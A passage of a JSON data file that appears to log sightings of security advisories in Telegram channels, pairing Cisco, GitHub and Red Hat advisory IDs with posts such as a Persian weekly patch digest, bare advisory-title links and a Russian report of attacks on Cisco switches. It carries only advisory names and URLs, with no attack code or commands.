\u0627\u06cc\u0646 \u0622\u0633\u06cc\u0628 \u067e\u0630\u06cc\u0631\u06cc \u0647\u0627 \u0634\u062f\u062a \u0628\u0627\u0644\u0627 \u062f\u0627\u0631\u0646\u062f . \n\n\u2022  ASA Software DNS Denial-of-Service Vulnerability :cisco-sa-20170419-asa-dns\n\n\u2022  ASA Software IPsec Denial-of-Service Vulnerability: cisco-sa-20170419-asa-ipsec\n\n\u2022  ASA Software SSL/TLS Denial-of-Service Vulnerability: cisco-sa-20170419-asa-tls\n\n\u2022  ASA Software Internet Key Exchange Version 1 XAUTH Denial-of-Service Vulnerability: cisco-sa-20170419-asa-xauth\n\n\u2022  IOS and IOS XE Software EnergyWise Denial-of-Service Vulnerabilities: cisco-sa-20170419-energywise\n\n\u2022  Firepower Detection Engine Pragmatic General Multicast Protocol Decoding Denial-of-Service Vulnerability: cisco-sa-20170419-fpsnort\n\n\u2022  Unified Communications Manager Denial-of-Service Vulnerability: cisco-sa-20170419-ucm\n\n\n\ud83d\udd39\u0644\u06cc\u0633\u062a \u06a9\u0627\u0645\u0644 \u0622\u0633\u06cc\u0628 \u067e\u0630\u06cc\u0631\u06cc \u0647\u0627\u06cc \u0627\u0639\u0644\u0627\u0645 \u0634\u062f\u0647 \u0627\u0632 \u0633\u0648\u06cc Cisco \u0631\u0627 \u062f\u0631 \u067e\u06cc\u0648\u0646\u062f \u0632\u06cc\u0631 \u0645\u0644\u0627\u062d\u0638\u0647 \u0641\u0631\u0645\u0627\u0626\u06cc\u062f .\n\n\ud83c\udf10  https://tools.cisco.com/security/center/publicationListing.x\n\n\n\ud83d\udd3b Apr 19 Drupal\n\n\ud83d\udd38\u062f\u0631 \u0646\u0647\u0627\u06cc\u062a Drupal \u0646\u06cc\u0632 \u0628\u0631\u0627\u06cc \u0631\u0641\u0639 \u0622\u0633\u06cc\u0628 \u067e\u0630\u06cc\u0631\u06cc \u0647\u0627\u06cc \u0628\u0627 \u0634\u062f\u062a Critical \u060c \u0646\u0633\u062e\u0647 \u0647\u0627\u06cc 8.2.8 \u0648 8.3.1 \u0631\u0627 \u0645\u0646\u062a\u0634\u0631 \u06a9\u0631\u062f .\n\n\ud83c\udf10 https://www.drupal.org/project/drupal/releases/8.2.8\n\ud83c\udf10 https://www.drupal.org/project/drupal/releases/8.3.1\n\n\n\u269c\u269c  \u0634\u0627\u062a\u0648\u0628 \u062f\u0631\u06cc\u0686\u0647 \u0627\u06cc \u0628\u0647 \u062f\u0646\u06cc\u0627\u06cc \u0631\u0627\u06cc\u0627\u0646\u0647 \u269c\u269c\n\n\ud83c\udd94 @SHATOOB", "creation_timestamp": "2017-04-25T20:10:46.000000Z"}, {"uuid": "796bbbbd-7dd6-4c6b-8104-6f1555c187b0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CISCO-SA-20170419-FPSNORT", "type": "seen", "source": "https://t.me/SHATOOB/1462", "content": "\ud83c\udd94 @SHATOOB\n\n#Update\n\n\u0647\u0641\u062a\u0647 \u067e\u0631\u06a9\u0627\u0631 \u062f\u0631 \u0628\u0631\u0648\u0632 \u0631\u0633\u0627\u0646\u06cc \u0645\u062d\u0635\u0648\u0644\u0627\u062a\n\n\ud83d\udd3b  Apr 18  Oracle\n\n\ud83d\udd38\u0648\u0635\u0644\u0647 \u0647\u0627\u06cc \u0628\u0631\u0648\u0632 \u0631\u0633\u0627\u0646\u06cc April 2017 \u0627\u0632 \u0633\u0648\u06cc Oracle \u0628\u0631\u0627\u06cc \u0631\u0641\u0639 299 \u0622\u0633\u06cc\u0628 \u067e\u0630\u06cc\u0631\u06cc \u062f\u0631 \u0645\u062d\u0635\u0648\u0644\u0627\u062a \u0645\u062e\u062a\u0644\u0641 \u0627\u06cc\u0646 \u0634\u0631\u06a9\u062a \u0645\u0646\u062a\u0634\u0631 \u06af\u0631\u062f\u06cc\u062f .\n\n\ud83c\udf10 http://www.oracle.com/technetwork/security-advisory/cpuapr2017-3236618.html\n\n\n\ud83d\udd3b Apr 18 VMware\n\n\ud83d\udd39\u0634\u0631\u06a9\u062a VMware \u0628\u0631\u0648\u0632\u0631\u0633\u0627\u0646\u06cc \u0647\u0627\u06cc \u0627\u0645\u0646\u06cc\u062a\u06cc \u0628\u0631\u0627\u06cc \u0631\u0641\u0639 \u0622\u0633\u06cc\u0628 \u067e\u0630\u06cc\u0631\u06cc \u0647\u0627\u06cc Unified Access Gateway\u060c Horizon View \u0648 Workstation \u0645\u0646\u062a\u0634\u0631 \u06a9\u0631\u062f . \u0628\u0631\u062e\u06cc \u0627\u0632 \u0627\u06cc\u0646 \u0622\u0633\u06cc\u0628 \u067e\u0630\u06cc\u0631\u06cc \u0647\u0627 \u0628\u0627 \u0634\u062f\u062a Critical \u062f\u0631\u062c\u0647 \u0628\u0646\u062f\u06cc \u0634\u062f\u0647 \u0627\u0646\u062f .\n\n\ud83c\udf10 http://www.vmware.com/security/advisories/VMSA-2017-0008.html\n\n\n\ud83d\udd3b Apr 19 Chrome\n\n\ud83d\udd38\u0627\u0646\u062a\u0634\u0627\u0631 \u0646\u0633\u062e\u0647 Chrome 58.0.3029.81 \u0628\u0631\u0627\u06cc Windows \u060c Mac \u0648 Linux \u062a\u0648\u0633\u0637 Google \u062c\u0647\u062a \u0631\u0641\u0639 \u0622\u0633\u06cc\u0628 \u067e\u0630\u06cc\u0631\u06cc \u0647\u0627\u06cc \u0645\u062a\u0639\u062f\u062f \u0627\u06cc\u0646 \u0645\u0631\u0648\u0631\u06af\u0631 .\n\n\ud83c\udf10  https://chromereleases.googleblog.com/2017/04/stable-channel-update-for-desktop.html\n\n\n\ud83d\udd3b Apr 19 Firefox\n\n\ud83d\udd39\u0628\u0646\u06cc\u0627\u062f  Mozilla \u0646\u06cc\u0632 \u0628\u0631\u0648\u0632\u0631\u0633\u0627\u0646\u06cc \u0647\u0627\u06cc\u06cc \u0628\u0631\u0627\u06cc \u0631\u0641\u0639 \u0622\u0633\u06cc\u0628 \u067e\u0630\u06cc\u0631\u06cc \u0627\u0646\u0648\u0627\u0639 \u0646\u0633\u062e\u0647 \u0647\u0627\u06cc Firefox \u0645\u0646\u062a\u0634\u0631 \u06a9\u0631\u062f .  \u0646\u0633\u062e\u0647 \u0647\u0627\u06cc Firefox 53\u060c Firefox ESR 45.9 \u0648 Firefox ESR 52.1 \u062c\u0647\u062a \u0631\u0641\u0639 \u0627\u06cc\u0646 \u0622\u064f\u0633\u06cc\u0628 \u067e\u0630\u06cc\u0631\u06cc \u0647\u0627 \u0645\u0646\u062a\u0634\u0631 \u0634\u062f\u0646\u062f .\n\n\ud83c\udf10 https://www.mozilla.org/en-US/security/advisories/mfsa2017-10/\n\ud83c\udf10 https://www.mozilla.org/en-US/security/advisories/mfsa2017-11/\n\ud83c\udf10 https://www.mozilla.org/en-US/security/advisories/mfsa2017-12/\n\n\n\ud83d\udd3b Apr 19  Cisco\n\n\ud83d\udd38\u0634\u0631\u06a9\u062a Cisco \u0628\u0631\u0648\u0632\u0631\u0633\u0627\u0646\u06cc \u0647\u0627\u06cc\u06cc \u0631\u0627 \u0628\u0631\u0627\u06cc \u0631\u0641\u0639 \u0622\u0633\u06cc\u0628 \u067e\u0630\u06cc\u0631\u06cc \u0647\u0627\u06cc \u0645\u062a\u0639\u062f\u062f \u062f\u0631 \u0645\u062d\u0635\u0648\u0644\u0627\u062a \u0645\u062e\u062a\u0644\u0641 \u062e\u0648\u062f \u0645\u0646\u062a\u0634\u0631 \u06a9\u0631\u062f \u06a9\u0647 \u0628\u0631\u062e\u06cc \u0627\u0632 \u0627\u06cc\u0646 \u0622\u0633\u06cc\u0628 \u067e\u0630\u06cc\u0631\u06cc \u0647\u0627 \u0634\u062f\u062a \u0628\u0627\u0644\u0627 \u062f\u0627\u0631\u0646\u062f . \n\n\u2022  ASA Software DNS Denial-of-Service Vulnerability :cisco-sa-20170419-asa-dns\n\n\u2022  ASA Software IPsec Denial-of-Service Vulnerability: cisco-sa-20170419-asa-ipsec\n\n\u2022  ASA Software SSL/TLS Denial-of-Service Vulnerability: cisco-sa-20170419-asa-tls\n\n\u2022  ASA Software Internet Key Exchange Version 1 XAUTH Denial-of-Service Vulnerability: cisco-sa-20170419-asa-xauth\n\n\u2022  IOS and IOS XE Software EnergyWise Denial-of-Service Vulnerabilities: cisco-sa-20170419-energywise\n\n\u2022  Firepower Detection Engine Pragmatic General Multicast Protocol Decoding Denial-of-Service Vulnerability: cisco-sa-20170419-fpsnort\n\n\u2022  Unified Communications Manager Denial-of-Service Vulnerability: cisco-sa-20170419-ucm\n\n\n\ud83d\udd39\u0644\u06cc\u0633\u062a \u06a9\u0627\u0645\u0644 \u0622\u0633\u06cc\u0628 \u067e\u0630\u06cc\u0631\u06cc \u0647\u0627\u06cc \u0627\u0639\u0644\u0627\u0645 \u0634\u062f\u0647 \u0627\u0632 \u0633\u0648\u06cc Cisco \u0631\u0627 \u062f\u0631 \u067e\u06cc\u0648\u0646\u062f \u0632\u06cc\u0631 \u0645\u0644\u0627\u062d\u0638\u0647 \u0641\u0631\u0645\u0627\u0626\u06cc\u062f .\n\n\ud83c\udf10  https://tools.cisco.com/security/center/publicationListing.x\n\n\n\ud83d\udd3b Apr 19 Drupal\n\n\ud83d\udd38\u062f\u0631 \u0646\u0647\u0627\u06cc\u062a Drupal \u0646\u06cc\u0632 \u0628\u0631\u0627\u06cc \u0631\u0641\u0639 \u0622\u0633\u06cc\u0628 \u067e\u0630\u06cc\u0631\u06cc \u0647\u0627\u06cc \u0628\u0627 \u0634\u062f\u062a Critical \u060c \u0646\u0633\u062e\u0647 \u0647\u0627\u06cc 8.2.8 \u0648 8.3.1 \u0631\u0627 \u0645\u0646\u062a\u0634\u0631 \u06a9\u0631\u062f .\n\n\ud83c\udf10 https://www.drupal.org/project/drupal/releases/8.2.8\n\ud83c\udf10 https://www.drupal.org/project/drupal/releases/8.3.1\n\n\n\u269c\u269c  \u0634\u0627\u062a\u0648\u0628 \u062f\u0631\u06cc\u0686\u0647 \u0627\u06cc \u0628\u0647 \u062f\u0646\u06cc\u0627\u06cc \u0631\u0627\u06cc\u0627\u0646\u0647 \u269c\u269c\n\n\ud83c\udd94 @SHATOOB", "creation_timestamp": "2017-04-25T20:10:46.000000Z"}, {"uuid": "1e28c4d6-6209-417e-961b-0e9524af09a3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CISCO-SA-20170419-ENERGYWISE", "type": "seen", "source": "https://t.me/SHATOOB/1462", "content": "\ud83c\udd94 @SHATOOB\n\n#Update\n\n\u0647\u0641\u062a\u0647 \u067e\u0631\u06a9\u0627\u0631 \u062f\u0631 \u0628\u0631\u0648\u0632 \u0631\u0633\u0627\u0646\u06cc \u0645\u062d\u0635\u0648\u0644\u0627\u062a\n\n\ud83d\udd3b  Apr 18  Oracle\n\n\ud83d\udd38\u0648\u0635\u0644\u0647 \u0647\u0627\u06cc \u0628\u0631\u0648\u0632 \u0631\u0633\u0627\u0646\u06cc April 2017 \u0627\u0632 \u0633\u0648\u06cc Oracle \u0628\u0631\u0627\u06cc \u0631\u0641\u0639 299 \u0622\u0633\u06cc\u0628 \u067e\u0630\u06cc\u0631\u06cc \u062f\u0631 \u0645\u062d\u0635\u0648\u0644\u0627\u062a \u0645\u062e\u062a\u0644\u0641 \u0627\u06cc\u0646 \u0634\u0631\u06a9\u062a \u0645\u0646\u062a\u0634\u0631 \u06af\u0631\u062f\u06cc\u062f .\n\n\ud83c\udf10 http://www.oracle.com/technetwork/security-advisory/cpuapr2017-3236618.html\n\n\n\ud83d\udd3b Apr 18 VMware\n\n\ud83d\udd39\u0634\u0631\u06a9\u062a VMware \u0628\u0631\u0648\u0632\u0631\u0633\u0627\u0646\u06cc \u0647\u0627\u06cc \u0627\u0645\u0646\u06cc\u062a\u06cc \u0628\u0631\u0627\u06cc \u0631\u0641\u0639 \u0622\u0633\u06cc\u0628 \u067e\u0630\u06cc\u0631\u06cc \u0647\u0627\u06cc Unified Access Gateway\u060c Horizon View \u0648 Workstation \u0645\u0646\u062a\u0634\u0631 \u06a9\u0631\u062f . \u0628\u0631\u062e\u06cc \u0627\u0632 \u0627\u06cc\u0646 \u0622\u0633\u06cc\u0628 \u067e\u0630\u06cc\u0631\u06cc \u0647\u0627 \u0628\u0627 \u0634\u062f\u062a Critical \u062f\u0631\u062c\u0647 \u0628\u0646\u062f\u06cc \u0634\u062f\u0647 \u0627\u0646\u062f .\n\n\ud83c\udf10 http://www.vmware.com/security/advisories/VMSA-2017-0008.html\n\n\n\ud83d\udd3b Apr 19 Chrome\n\n\ud83d\udd38\u0627\u0646\u062a\u0634\u0627\u0631 \u0646\u0633\u062e\u0647 Chrome 58.0.3029.81 \u0628\u0631\u0627\u06cc Windows \u060c Mac \u0648 Linux \u062a\u0648\u0633\u0637 Google \u062c\u0647\u062a \u0631\u0641\u0639 \u0622\u0633\u06cc\u0628 \u067e\u0630\u06cc\u0631\u06cc \u0647\u0627\u06cc \u0645\u062a\u0639\u062f\u062f \u0627\u06cc\u0646 \u0645\u0631\u0648\u0631\u06af\u0631 .\n\n\ud83c\udf10  https://chromereleases.googleblog.com/2017/04/stable-channel-update-for-desktop.html\n\n\n\ud83d\udd3b Apr 19 Firefox\n\n\ud83d\udd39\u0628\u0646\u06cc\u0627\u062f  Mozilla \u0646\u06cc\u0632 \u0628\u0631\u0648\u0632\u0631\u0633\u0627\u0646\u06cc \u0647\u0627\u06cc\u06cc \u0628\u0631\u0627\u06cc \u0631\u0641\u0639 \u0622\u0633\u06cc\u0628 \u067e\u0630\u06cc\u0631\u06cc \u0627\u0646\u0648\u0627\u0639 \u0646\u0633\u062e\u0647 \u0647\u0627\u06cc Firefox \u0645\u0646\u062a\u0634\u0631 \u06a9\u0631\u062f .  \u0646\u0633\u062e\u0647 \u0647\u0627\u06cc Firefox 53\u060c Firefox ESR 45.9 \u0648 Firefox ESR 52.1 \u062c\u0647\u062a \u0631\u0641\u0639 \u0627\u06cc\u0646 \u0622\u064f\u0633\u06cc\u0628 \u067e\u0630\u06cc\u0631\u06cc \u0647\u0627 \u0645\u0646\u062a\u0634\u0631 \u0634\u062f\u0646\u062f .\n\n\ud83c\udf10 https://www.mozilla.org/en-US/security/advisories/mfsa2017-10/\n\ud83c\udf10 https://www.mozilla.org/en-US/security/advisories/mfsa2017-11/\n\ud83c\udf10 https://www.mozilla.org/en-US/security/advisories/mfsa2017-12/\n\n\n\ud83d\udd3b Apr 19  Cisco\n\n\ud83d\udd38\u0634\u0631\u06a9\u062a Cisco \u0628\u0631\u0648\u0632\u0631\u0633\u0627\u0646\u06cc \u0647\u0627\u06cc\u06cc \u0631\u0627 \u0628\u0631\u0627\u06cc \u0631\u0641\u0639 \u0622\u0633\u06cc\u0628 \u067e\u0630\u06cc\u0631\u06cc \u0647\u0627\u06cc \u0645\u062a\u0639\u062f\u062f \u062f\u0631 \u0645\u062d\u0635\u0648\u0644\u0627\u062a \u0645\u062e\u062a\u0644\u0641 \u062e\u0648\u062f \u0645\u0646\u062a\u0634\u0631 \u06a9\u0631\u062f \u06a9\u0647 \u0628\u0631\u062e\u06cc \u0627\u0632 \u0627\u06cc\u0646 \u0622\u0633\u06cc\u0628 \u067e\u0630\u06cc\u0631\u06cc \u0647\u0627 \u0634\u062f\u062a \u0628\u0627\u0644\u0627 \u062f\u0627\u0631\u0646\u062f . \n\n\u2022  ASA Software DNS Denial-of-Service Vulnerability :cisco-sa-20170419-asa-dns\n\n\u2022  ASA Software IPsec Denial-of-Service Vulnerability: cisco-sa-20170419-asa-ipsec\n\n\u2022  ASA Software SSL/TLS Denial-of-Service Vulnerability: cisco-sa-20170419-asa-tls\n\n\u2022  ASA Software Internet Key Exchange Version 1 XAUTH Denial-of-Service Vulnerability: cisco-sa-20170419-asa-xauth\n\n\u2022  IOS and IOS XE Software EnergyWise Denial-of-Service Vulnerabilities: cisco-sa-20170419-energywise\n\n\u2022  Firepower Detection Engine Pragmatic General Multicast Protocol Decoding Denial-of-Service Vulnerability: cisco-sa-20170419-fpsnort\n\n\u2022  Unified Communications Manager Denial-of-Service Vulnerability: cisco-sa-20170419-ucm\n\n\n\ud83d\udd39\u0644\u06cc\u0633\u062a \u06a9\u0627\u0645\u0644 \u0622\u0633\u06cc\u0628 \u067e\u0630\u06cc\u0631\u06cc \u0647\u0627\u06cc \u0627\u0639\u0644\u0627\u0645 \u0634\u062f\u0647 \u0627\u0632 \u0633\u0648\u06cc Cisco \u0631\u0627 \u062f\u0631 \u067e\u06cc\u0648\u0646\u062f \u0632\u06cc\u0631 \u0645\u0644\u0627\u062d\u0638\u0647 \u0641\u0631\u0645\u0627\u0626\u06cc\u062f .\n\n\ud83c\udf10  https://tools.cisco.com/security/center/publicationListing.x\n\n\n\ud83d\udd3b Apr 19 Drupal\n\n\ud83d\udd38\u062f\u0631 \u0646\u0647\u0627\u06cc\u062a Drupal \u0646\u06cc\u0632 \u0628\u0631\u0627\u06cc \u0631\u0641\u0639 \u0622\u0633\u06cc\u0628 \u067e\u0630\u06cc\u0631\u06cc \u0647\u0627\u06cc \u0628\u0627 \u0634\u062f\u062a Critical \u060c \u0646\u0633\u062e\u0647 \u0647\u0627\u06cc 8.2.8 \u0648 8.3.1 \u0631\u0627 \u0645\u0646\u062a\u0634\u0631 \u06a9\u0631\u062f .\n\n\ud83c\udf10 https://www.drupal.org/project/drupal/releases/8.2.8\n\ud83c\udf10 https://www.drupal.org/project/drupal/releases/8.3.1\n\n\n\u269c\u269c  \u0634\u0627\u062a\u0648\u0628 \u062f\u0631\u06cc\u0686\u0647 \u0627\u06cc \u0628\u0647 \u062f\u0646\u06cc\u0627\u06cc \u0631\u0627\u06cc\u0627\u0646\u0647 \u269c\u269c\n\n\ud83c\udd94 @SHATOOB", "creation_timestamp": "2017-04-25T20:10:46.000000Z"}, {"uuid": "a3f2a89c-1b45-4e2c-aaee-da16d0e1bb74", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-V95C-P5HM-XQ8F", "type": "seen", "source": "https://t.me/BlueRedTeam/1289", "content": "#exploit\n1. CVE-2021-43784:\nrunc/libcontainer - insecure handling of bind mount sources\nhttps://bugs.chromium.org/p/project-zero/issues/detail?id=2241\n]-&gt; https://github.com/opencontainers/runc/security/advisories/GHSA-v95c-p5hm-xq8f\n\n2. CVE-2021-1048:\nrefcount increment on mid-destruction file\nhttps://googleprojectzero.github.io/0days-in-the-wild/0day-RCAs/2021/CVE-2021-1048.html\n\n@BlueRedTeam", "creation_timestamp": "2021-12-07T09:32:57.000000Z"}, {"uuid": "ac3ccafb-e362-485e-86a1-a5aa354e3169", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CISCO-SA-20180418-WBS", "type": "seen", "source": "https://t.me/canyoupwnme/3616", "content": "Cisco WebEx Clients Remote Code Execution Vulnerability\nhttps://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20180418-wbs", "creation_timestamp": "2018-04-19T20:05:56.000000Z"}, {"uuid": "9bf2d0d3-7fe1-4221-bb07-2e94521872a2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CISCO-SA-20180129-ASA1", "type": "seen", "source": "https://t.me/canyoupwnme/3147", "content": "Cisco Adaptive Security Appliance Remote Code Execution and Denial of Service Vulnerability\nhttps://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20180129-asa1", "creation_timestamp": "2018-01-29T23:56:15.000000Z"}, {"uuid": "6026905c-cc5a-435d-ad5a-c8e87f202cd8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CISCO-SA-20170315-ASR", "type": "seen", "source": "https://t.me/canyoupwnme/950", "content": "Cisco StarOS SSH Privilege Escalation Vulnerability\nhttps://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20170315-asr", "creation_timestamp": "2017-03-15T22:20:58.000000Z"}, {"uuid": "9a55dcc5-024d-4e9f-8660-9d580305f23d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CISCO-SA-20170705-ESC1", "type": "seen", "source": "https://t.me/zatelecom/819", "content": "\u041e \u043a\u0430\u043a. \u0412 \u0426\u044b\u0441\u043a\u0430\u0445 \u043d\u0430\u0448\u043b\u0438 \u043d\u0435\u0443\u0431\u0438\u0432\u0430\u0435\u043c\u043e\u0433\u043e \u0437\u0430\u0445\u0430\u0440\u0434\u043a\u043e\u0436\u0435\u043d\u043d\u043e\u0433\u043e \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f - tomcat. \u041e\u043d \u043f\u043e\u0442\u0435\u043d\u0446\u0438\u0430\u043b\u044c\u043d\u043e \u043c\u043e\u0436\u0435\u0442 \u0431\u044b\u0442\u044c \u043f\u043e\u0432\u044b\u0448\u0435\u043d \u0434\u043e \u0440\u0443\u0442\u0430, \u0441\u043e \u0432\u0441\u0435\u043c\u0438 \u0432\u044b\u0442\u0435\u043a\u0430\u044e\u0449\u0438\u043c\u0438.\n\u041a \u0441\u0447\u0430\u0441\u0442\u044c\u044e, \u0441\u0438\u0435 \u043e\u0442\u043d\u043e\u0441\u0438\u0442\u0441\u044f \u0442\u043e\u043b\u044c\u043a\u043e \u043a Cisco Elastic Services - \u044d\u0442\u043e \u0442\u0430\u043a\u043e\u0439 \u043f\u0440\u043e\u0434\u0443\u043a\u0442, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u043a\u0430\u043a \u0431\u044b SDN. \u041f\u043e\u0434\u043e\u0437\u0440\u0435\u0432\u0430\u044e, \u0447\u0442\u043e \u0432 \u0420\u043e\u0441\u0441\u0438\u0438 \u043d\u0438 \u0443 \u043a\u043e\u0433\u043e \u043d\u0435\u0442\u0443 \u0432 \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0438.\n\u041f\u0440\u0443\u0444:\nhttps://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20170705-esc1", "creation_timestamp": "2017-07-09T21:01:58.000000Z"}, {"uuid": "6ab4b213-cdd4-4d87-acde-f2a84daf6e9c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CISCO-SA-20170315-WMS", "type": "seen", "source": "https://t.me/canyoupwnme/951", "content": "Cisco WebEx Meetings Server XML External Entity Vulnerability\nhttps://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20170315-wms", "creation_timestamp": "2017-03-15T22:26:27.000000Z"}, {"uuid": "cd9e3d4e-c664-4ec9-943b-1120ddbcb3f6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CISCO-SA-20181019-LIBSSH", "type": "seen", "source": "https://t.me/canyoupwnme/4614", "content": "libssh Authentication Bypass Vulnerability Affecting Cisco Products: October 2018\nhttps://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20181019-libssh", "creation_timestamp": "2018-10-20T14:07:51.000000Z"}, {"uuid": "db2968a3-2575-43b8-8bff-14ab0e212545", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-Q2JF-H9JM-M7P4", "type": "seen", "source": "https://t.me/canyoupwnme/6855", "content": "Django contains Uncontrolled Resource Consumption via cached header\nhttps://github.com/advisories/GHSA-q2jf-h9jm-m7p4", "creation_timestamp": "2023-03-01T11:31:30.000000Z"}, {"uuid": "b65af846-e80e-4a5d-b6d3-15db99af2667", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2019:0010", "type": "seen", "source": "https://t.me/canyoupwnme/4933", "content": "Important: rh-perl524-perl security update\nhttps://access.redhat.com/errata/RHSA-2019:0010", "creation_timestamp": "2019-01-02T17:33:53.000000Z"}, {"uuid": "627b1821-ae4a-4647-a196-a59f40a6929a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CISCO-SA-20180307-CPCP", "type": "seen", "source": "https://t.me/canyoupwnme/3399", "content": "Cisco Prime Collaboration Provisioning Hard-Coded Password Vulnerability\nhttps://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20180307-cpcp", "creation_timestamp": "2018-03-10T11:14:38.000000Z"}, {"uuid": "c5c7b1f1-0c5b-45ea-a25e-f095e5f3ec33", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-H4MF-75HF-67W4", "type": "seen", "source": "https://t.me/canyoupwnme/6311", "content": "NoSQL 'where' injection\nhttps://github.com/advisories/GHSA-h4mf-75hf-67w4", "creation_timestamp": "2020-03-06T09:48:23.000000Z"}, {"uuid": "e619749e-f5f2-4013-9e75-1c146b824786", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CISCO-SA-20170629-SNMP", "type": "published-proof-of-concept", "source": "https://t.me/canyoupwnme/2981", "content": "CVE-2017-6736 / cisco-sa-20170629-snmp Cisco IOS remote code execution\nhttps://github.com/artkond/cisco-snmp-rce", "creation_timestamp": "2018-01-07T23:54:01.000000Z"}, {"uuid": "d2b5ed7f-4548-42c2-943b-76ed0ff481d2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CISCO-SA-20170214-SMI", "type": "exploited", "source": "https://t.me/kasperskylab_ru/162", "content": "\u0427\u0442\u043e \u0441\u043b\u0443\u0447\u0438\u043b\u043e\u0441\u044c \u0441 \u0418\u043d\u0442\u0435\u0440\u043d\u0435\u0442\u043e\u043c?\n \n\u0421\u043e\u0433\u043b\u0430\u0441\u043d\u043e \u043d\u0430\u0448\u0438\u043c \u0438\u0441\u0442\u043e\u0447\u043d\u0438\u043a\u0430\u043c, \u0441\u0435\u0439\u0447\u0430\u0441 \u043f\u0440\u043e\u0438\u0441\u0445\u043e\u0434\u0438\u0442 \u043c\u0430\u0441\u0441\u0438\u0432\u043d\u0430\u044f \u0430\u0442\u0430\u043a\u0430 \u043d\u0430 \u0441\u0432\u0438\u0442\u0447\u0438 Cisco. \u041d\u0435\u043a\u0430\u044f \u0433\u0440\u0443\u043f\u043f\u0438\u0440\u043e\u0432\u043a\u0430 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u0442 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0432 \u043f\u0440\u043e\u0433\u0440\u0430\u043c\u043c\u0435 \u043f\u043e\u0434 \u043d\u0430\u0437\u0432\u0430\u043d\u0438\u0435\u043c Cisco Smart Install Client, \u0447\u0442\u043e\u0431\u044b \u043f\u043e\u043b\u0443\u0447\u0438\u0442\u044c \u0432\u043e\u0437\u043c\u043e\u0436\u043d\u043e\u0441\u0442\u044c \u0438\u0441\u043f\u043e\u043b\u043d\u044f\u0442\u044c \u043f\u0440\u043e\u0438\u0437\u0432\u043e\u043b\u044c\u043d\u044b\u0439 \u043a\u043e\u0434 \u043d\u0430 \u0443\u0441\u0442\u0440\u043e\u0439\u0441\u0442\u0432\u0435.\n \n\u0412 \u0440\u0435\u0437\u0443\u043b\u044c\u0442\u0430\u0442\u0435 \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0438 \u043c\u0435\u043d\u044f\u044e\u0442 \u043a\u043e\u043d\u0444\u0438\u0433\u0443\u0440\u0430\u0446\u0438\u044e \u0443\u0441\u0442\u0440\u043e\u0439\u0441\u0442\u0432\u0430 \u0438 \u043f\u0435\u0440\u0435\u0437\u0430\u043f\u0438\u0441\u044b\u0432\u0430\u044e\u0442 \u043a\u043e\u043d\u0444\u0438\u0433\u0443\u0440\u0430\u0446\u0438\u043e\u043d\u043d\u044b\u0439 \u0444\u0430\u0439\u043b, \u043e\u0441\u0442\u0430\u0432\u043b\u044f\u044f \u0432 \u043d\u0435\u043c \u043f\u043e\u0441\u043b\u0430\u043d\u0438\u0435 \u201cDo not mess with our elections\u201d (\u00ab\u041d\u0435 \u0432\u043c\u0435\u0448\u0438\u0432\u0430\u0439\u0442\u0435\u0441\u044c \u0432 \u043d\u0430\u0448\u0438 \u0432\u044b\u0431\u043e\u0440\u044b\u00bb). \u041f\u043e\u0445\u043e\u0436\u0435, \u0447\u0442\u043e \u0434\u043b\u044f \u0430\u0442\u0430\u043a\u0438 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u0442\u0441\u044f \u0431\u043e\u0442, 